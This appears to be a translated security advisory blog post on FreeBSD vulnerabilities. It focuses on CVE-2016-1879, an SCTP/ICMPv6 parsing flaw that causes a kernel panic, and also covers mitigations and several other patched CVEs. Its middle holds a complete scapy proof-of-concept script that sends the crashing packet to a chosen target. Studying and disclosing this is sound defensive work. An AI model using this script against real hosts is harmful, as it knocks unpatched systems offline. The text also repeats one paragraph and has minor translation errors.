Critical Vulnerabilities Detected in FreeBSD



    The FreeBSD project team reports that a number of critical vulnerabilities have been detected in the operating system that allow attackers to conduct denial of service attacks, increase privileges, and disclose sensitive data.

    ICTPv6 SCTP Stack Parsing Vulnerability - CVE-2016-1879


    SCTP (Stream Control Transmission Protocol) is a transport layer protocol that is designed to transmit telephone network signaling messages in an IP environment. This protocol is mainly used in technological networks of telecom operators.

    FreeBSD versions 9.3, 10.1, and 10.2 are affected by this vulnerability if they are configured with SCTP and IPv6 protocols (the default configuration). To exploit the error, the attacker needs to send a specially crafted ICMPv6 message. Successful operation enables a denial of service (DoS) attack.

    DoS results from insufficient verification of the length of the SCTP packet header received in the ICMPv6 error message. When the destination is unavailable, the router can generate an error message and forward it to the sender through ICMPv6.

    The original IPv6 packet is enclosed in such an ICMPv6 packet, in which the Next Header field indicates how the upper layer protocol is encapsulated. In this case, it is SCTP.



    When the kernel receives an error message via ICMPv6, it finds the top-level protocol packet in it and passes it to the appropriate handler (in this case sctp6_ctlinput ()).

    When the kernel receives an error message via ICMPv6, it finds the top-level protocol packet in it and passes it to the appropriate handler (in this case sctp6_ctlinput ()). The SCTP handler assumes that the input packet contains a header of sufficient length, tries to copy it using m_copydata (), into which the offset values ​​and the number of bytes to be read are transmitted. Since a data block of 12 bytes is expected, if a packet with an SCTP header of less than 12 bytes is sent, the null pointer is dereferenced, which causes a critical kernel kernel (kernel panic) failure.

    To exploit the vulnerability, having an open SCTP socket is optional.
    You can create an ICMPv6 packet for an attack using scapy. On Habré many articles devoted to this powerful tool (for example, this and this article).

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import argparse
    from scapy.all import *
    def get_args():
        parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
        parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
        parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
        parser.add_argument("-I", "--iface", type=str, help="Iface")
        options = parser.parse_args()
        if options.dst_mac is None or options.dst_ipv6 is None:
            parser.print_help()
            exit()
        return options
    if __name__ == '__main__':
        options = get_args()
        sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132,
                                                                                                   src=options.dst_ipv6,
                                                                                                   dst='fe80::230:56ff:fea6:648c'),
              iface=options.iface)
    

    Video attack demonstration:



    In order to protect yourself from an attack using this security error, you should do the following:

    • disable IPv6 addressing if it is not required;
    • Block ICMPv6 or IPv6 traffic on the firewall
    • disable SCTP stack support in the kernel of the operating system - if it is not needed (kernel recompilation is required).

    To fix the vulnerability, you can use a patch from the manufacturer, which introduces additional checks to the processing of ICMPv6 messages in the SCTP stack. And you will need to recompile the kernel.

    That's not all


    In addition, a number of serious vulnerabilities were discovered in the system. FreeBSD developers have released several patches that fix these errors:

    1. Vulnerability to allow a DoS attack due to an error that occurred while processing TCP connections with the TCP_MD5SIG and TCP_NOOPT socket options enabled. For successful exploitation, an attacker needs to open a listening socket with the TCP_NOOPT option enabled. (CVE-2016-1882, patch );
    2. Vulnerability that could allow a local user to elevate privileges or cause denial of service: this is possible due to an access control error that allows overwriting random memory locations using specially crafted system calls of the Linux setgroup compatibility layer (2). (CVE-2016-1881, patch );
    3. Due to an error in the Linux robust futex lists, hackers are able to reveal system memory data (CVE-2016-1880, patch );
    4. Insecure default security settings that allow access to the bsnmpd daemon configuration file “/etc/bsnmpd.conf” (CVE-2015-5677, patch ).

    In order to avoid problems associated with the exploitation of these vulnerabilities, Positive Technologies experts recommend using IPv6 addressing only if it is required for the application to function, install security updates from OS developers in a timely manner and use specialized tools to control system security (for example, MaxPatrol ) to control the security of the system.

    Also popular now: